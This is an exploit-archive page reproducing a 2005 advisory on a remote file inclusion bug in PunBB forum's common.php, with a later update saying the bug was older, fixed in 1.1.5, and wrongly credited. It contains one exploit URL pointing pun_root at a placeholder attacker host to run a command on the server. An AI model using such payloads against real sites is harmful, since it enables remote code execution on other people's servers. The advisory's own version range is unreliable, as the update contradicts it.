Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2005100054

Below is a copy:

Remote File Inclusion in forum PunBB

Date:24/10/2005

Severity: High

version: 1.1.2 >> 1.1.5

The bug reside in common.php

Exploit :

http://www.host.com/forum/include/common.php?pun_root=http://www.host_ev
il.com/cmd?&=id

Discovery by RoDheDoR

L-G-H Team

http://www.lezr.com

--------------------------------------------------------------------------------------------
UPDATE : 

1. The bug is over a year old (see bid 10760).
2. The bug was fixed in 1.1.5, so that version is not vulnerable.
3. It was discovered by Radek Hulan, not "RoDheDoR".
4. The exploit detailed is copied directly from the old bid so "RoDheDoR" was obviously aware of it. 

Copyright ©2020 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.